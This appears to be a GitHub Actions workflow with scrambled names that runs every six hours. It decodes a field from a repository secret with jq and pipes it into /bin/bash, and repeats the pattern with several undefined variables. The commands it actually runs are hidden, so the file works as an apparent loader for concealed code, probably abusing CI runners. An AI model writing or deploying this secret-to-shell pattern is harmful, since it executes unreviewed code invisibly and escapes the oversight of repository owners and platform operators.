name: wendixiang9772
on:
  workflow_dispatch:
  schedule:
    - cron: '27 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wendixiang9772
        env:
          l97: ${{ secrets.l97 }}
        run: |
          echo $l97 | jq -r .srrjy98368 | /bin/bash
          echo $g68 | jq -r .m8 | /bin/bash
          echo $q2 | jq -r .v65710 | /bin/bash
          echo $wtv75631 | jq -r .rygg26272 | /bin/bash

